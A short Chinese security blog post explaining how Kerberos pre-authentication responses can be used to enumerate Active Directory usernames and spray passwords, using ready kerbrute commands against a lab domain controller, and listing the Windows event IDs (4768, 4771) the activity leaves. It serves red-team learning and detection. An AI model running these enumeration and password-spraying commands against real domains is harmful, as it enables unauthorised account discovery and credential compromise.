[域渗透]Kerberos pre-auth枚举用户与爆破

一、原因说明

Kerberos pre-auth对应的端口默认为88,在AS_REQ里面cname 是请求的用户,用户名存在和不存在,返回的包有差异,可以用于枚举域内用户名所以造成利用点

(用的是三好学生师傅的图)

二、 Kerberos pre-auth枚举利用

使用工具github:https://github.com/ropnop/kerbrute/releases

当获取一台不在域内得机器但是可以和dc通信就可以利用此方法。

枚举域内用户:kerbrute_windows_amd64.exe userenum --dc 192.168.37.131 -d redteam.com  .user.txt

密码喷射:kerbrute_windows_amd64.exe passwordspray --dc 192.168.37.131 -d redteam.com user.txt user@123

三、操作产生的日志

口令验证成功时产生日志(4768 - A Kerberos authentication ticket (TGT) was requested)
口令验证失败时产生日志(4771 - Kerberos pre-authentication failed)

参考链接:

https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87Kerberos-pre-auth%E8%BF%9B%E8%A1%8C%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E5%92%8C%E5%8F%A3%E4%BB%A4%E7%88%86%E7%A0%B4/

原文地址:https://www.cnblogs.com/websecyw/p/13262464.html